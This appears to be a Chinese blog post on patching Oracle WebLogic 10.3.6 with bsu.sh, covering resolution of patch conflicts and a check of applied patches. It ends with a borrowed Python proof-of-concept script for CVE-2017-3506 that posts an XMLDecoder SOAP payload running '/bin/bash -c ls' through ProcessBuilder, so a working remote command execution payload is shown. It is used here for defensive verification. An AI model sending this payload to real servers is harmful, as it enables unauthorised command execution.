weblogic打补丁方法
2018.01.09 15:12:35字数 732阅读 7,417
weblogic虽然是大牌oracle的重量级中间件,但是也还是会时不时爆出一些漏洞的,这些漏洞如果不及时打补丁补救,很快会被一些黑客拿来去一些网站换积分或者当挂马做肉鸡。废话不多说,因为weblogic打补丁的方式基本都是一个套路,这里记录下weblogic的打补丁方法。
1、环境
{MW_HOME} = /usr/local/bea
{WL_HOME} = /usr/local/bea/wlserver_10.3
下面使用{MW_HOME}和{WL_HOME}代替真正的路径
2、将补丁文件拷贝至{MW_HOME}/utils/bsu/cache_dir下并解压,通常会得到一个jar包和一个patch-catalog_xxxxx.xml这样的文件以及一个readme文档(英文好的完全可以看readme文档搞定、、、)
3、进入{MW_HOME}/utils/bsu/目录修改bsu.sh中内存参数为MEM_ARGS="-Xms1500m -Xmx1500m",这里内存大小视不同的补丁会有区别,过小的话会报错,不缺内存的话建议直接改大一点
4、执行安装补丁命令
bsu.sh -install -patch_download_dir={MW_HOME}/utils/bsu/cache_dir -patchlist={PATCH_ID} -prod_dir={WL_HOME}
粘贴格式可能会有问题,报错就手敲一遍、
5、这里是漫长的等待,漫长等待的结果有两种,一种是安装成功
Checking for conflicts............
No conflict(s) detected
Installing Patch ID: FMJJ..
Result: Success
另一种是补丁冲突~~
Checking for conflicts...........
Conflict(s) detected - resolve conflict condition and execute patch installation again
Conflict condition details follow:
Patch FMJJ is mutually exclusive and cannot coexist with patch(es): EJUW,ZLNA
这里提示看到该补丁和之前打的补丁EJUW和ZLNA相冲突,这时候就需要先卸载之前安装的补丁才能继续进行安装、
执行命令
./bsu.sh -remove -verbose -patchlist=EJUW -prod_dir={WL_HOME}
这里又是漫长的等待,weblogic会检测卸载是否有依赖,类似这种跟2个或以上补丁冲突的随便找一个(建议先删列表中的最后一个补丁、),然后漫长的等待之后系统会提示你想删除这个补丁还要先删除xxx补丁才行、、、
Checking for conflicts.......
Conflict(s) detected - resolve conflict condition and execute patch removal again
Conflict condition details follow:
The selected patch cannot be removed until the following patch(es) are removed first: ZLNA
然后只能按weblogic说的滚去挨个删完
Checking for conflicts...........
No conflict(s) detected
Starting removal of Patch ID: EJUW
Removing /usr/local/bea/modules/com.bea.core.weblogic.stax_1.11.0.0.jar
Removing /usr/local/bea/wlserver_10.3/server/lib/wlt3jmsclient.jar
Removing /usr/local/bea/wlserver_10.3/server/lib/wlt3client.jar
Removing /usr/local/bea/modules/com.bea.core.stax2_2.0.0.0_3-0-3.jar
Removing /usr/local/bea/wlserver_10.3/bugsfixed/WLS-PSU-bugsfixed.txt
Removing /usr/local/bea/wlserver_10.3/bugsfixed/20780171-WLS-10.3.6.0.12_PSU_WebServices-ClientSide-Configuration-README.txt
Restoring /usr/local/bea/wlserver_10.3/server/lib/consoleapp/APP-INF/lib/commons-fileupload.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wljmxclient.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/com.oracle.cie.config-wls-schema_10.3.6.0.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/common/wlst/modules/jython-modules.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/common/bin/wlsifconfig.sh from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wlstestclient.ear from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wlthint3client.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/com.bea.core.utils.full_1.10.0.0.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/com.bea.core.bea.opensaml_1.0.0.0_6-2-0-0.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/ws.databinding_1.3.0.0.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/common/deployable-libraries/jsf-2.0.war from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/schema/weblogic-domain-binding.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/webserviceclient+ssl.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wlw-langx.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wljmsclient.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wlsafclient.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/com.bea.core.apache_1.3.0.1.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wlsaft3client.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wseeclient.zip from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/com.bea.core.common.security.saml2_1.0.0.0_6-2-0-0.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/glassfish.jstl_1.2.0.1.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wls-api.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/common/deployable-libraries/jsf-1.2.war from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/common/deployable-libraries/jstl-1.2.war from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/com.bea.core.descriptor.wl.binding_1.4.0.0.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/com.oracle.cie.config-wls_7.2.0.0.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/jms-notran-adp.rar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/jms-xa-adp.rar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/jdbcdrivers.xml from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/uddiexplorer.war from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/ws.databinding.plugins_1.3.0.0.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/webserviceclient.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wlclient.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wseeclient.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/com.bea.core.utils_1.10.0.0.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/consoleapp/webapp/WEB-INF/lib/console.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/com.bea.core.bea.opensaml2_1.0.0.0_6-2-0-0.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Removing /usr/local/bea/patch_wls1036/patch_jars/BUG20780171_1036012.jar
Removing /usr/local/bea/patch_wls1036/patch_jars/com.bea.core.apache.commons.fileupload_1.0.0.0_1-3-1.jar
Removing /usr/local/bea/patch_wls1036/patch_jars/com.bea.core.stax2_2.0.0.0_3-0-3.jar
Removing /usr/local/bea/patch_wls1036/patch_jars/glassfish.jaxb.xjc_1.2.0.0_2-1-14.jar
Removing /usr/local/bea/patch_wls1036/patch_jars/glassfish.jaxb_1.2.0.0_2-1-14.jar
Removing /usr/local/bea/patch_wls1036/patch_jars/glassfish.jaxp_1.4.5.0.jar
Removing /usr/local/bea/patch_wls1036/patch_jars/glassfish.jaxws.mimepull_1.1.0.0_1-3-8.jar
Updating /usr/local/bea/patch_wls1036/profiles/default/sys_manifest_classpath/weblogic_patch.jar
Old manifest value: Class-Path= ../../../patch_jars/BUG20780171_1036012.jar ../../../patch_jars/com.bea.core.apache.commons.fileupload_1.0.0.0_1-3-1.jar ../../../patch_jars/com.bea.core.stax2_2.0.0.0_3-0-3.jar ../../../patch_jars/glassfish.jaxb.xjc_1.2.0.0_2-1-14.jar ../../../patch_jars/glassfish.jaxb_1.2.0.0_2-1-14.jar ../../../patch_jars/glassfish.jaxp_1.4.5.0.jar ../../../patch_jars/glassfish.jaxws.mimepull_1.1.0.0_1-3-8.jar
New manifest value: Class-Path=
Result: Success
然后继续安装,这时候就只会出现成功了
Checking for conflicts............
No conflict(s) detected
Installing Patch ID: FMJJ..
Result: Success
6、查看weblogic的补丁列表中是否已出现刚才安装的补丁
[bsu]# ./bsu.sh -prod_dir=/usr/local/bea/wlserver_10.3 -status=applied -verbose -view
ProductName: WebLogic Server
ProductVersion: 10.3 MP6
Components: WebLogic Server/Core Application Server,WebLogic Server/Admi
nistration Console,WebLogic Server/Configuration Wizard and
Upgrade Framework,WebLogic Server/Web 2.0 HTTP Pub-Sub Serve
r,WebLogic Server/WebLogic SCA,WebLogic Server/WebLogic JDBC
Drivers,WebLogic Server/Third Party JDBC Drivers,WebLogic S
erver/WebLogic Server Clients,WebLogic Server/WebLogic Web S
erver Plugins,WebLogic Server/UDDI and Xquery Support,WebLog
ic Server/Evaluation Database,WebLogic Server/Workshop Code
Completion Support
BEAHome: /usr/local/bea
ProductHome: /usr/local/bea/wlserver_10.3
PatchSystemDir: /usr/local/bea/utils/bsu
PatchDir: /usr/local/bea/patch_wls1036
Profile: Default
DownloadDir: /usr/local/bea/utils/bsu/cache_dir
JavaVersion: 1.6.0_29
JavaVendor: Sun
Patch ID: FMJJ
PatchContainer: FMJJ.jar
Checksum: 591477727
Severity: optional
Category: General
CR/BUG: 26519424
Restart: true
Description: WLS PATCH SET UPDATE 10.3.6.0.171017
WLS PATCH SET UPDATE 10
.3.6.0.171017
7、根据已有的POC脚本或者其他方式检测漏洞是否还在
这里是本次漏洞CEV-2017-3506对应的Python检测脚本,大神的博客扒来用下,勿怪勿怪~
#!/usr/bin/env python
# coding:utf-8
# auther:dayu(大神的签名)
import requests
import re
from sys import argv
heads = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
'Content-Type': 'text/xml;charset=UTF-8'
}
def poc(url):
if not url.startswith("http"):
url = "http://" + url
if "/" in url:
url += '/wls-wsat/CoordinatorPortType'
post_str = '''
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>ls</string>
</void>
</array>
<void method="start"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
'''
try:
response = requests.post(url, data=post_str, verify=False, timeout=5, headers=heads)
response = response.text
response = re.search(r"<faultstring>.*</faultstring>", response).group(0)
except Exception, e:
response = ""
if '<faultstring>java.lang.ProcessBuilder' in response or "<faultstring>0" in response:
result = "Vulnerability exist"
return result
else:
result = "No Vulnerability"
return result
if __name__ == '__main__':
if len(argv) == 1:
print "python 参数 url:port"
exit(0)
else:
url = argv[1]
result = poc(url=url)
print result
ps:本次记录是借用安装CEV-2017-3506补丁的机会,安装的补丁ID:FMJJ,安装冲突ID列表:ZLNA,EJUW。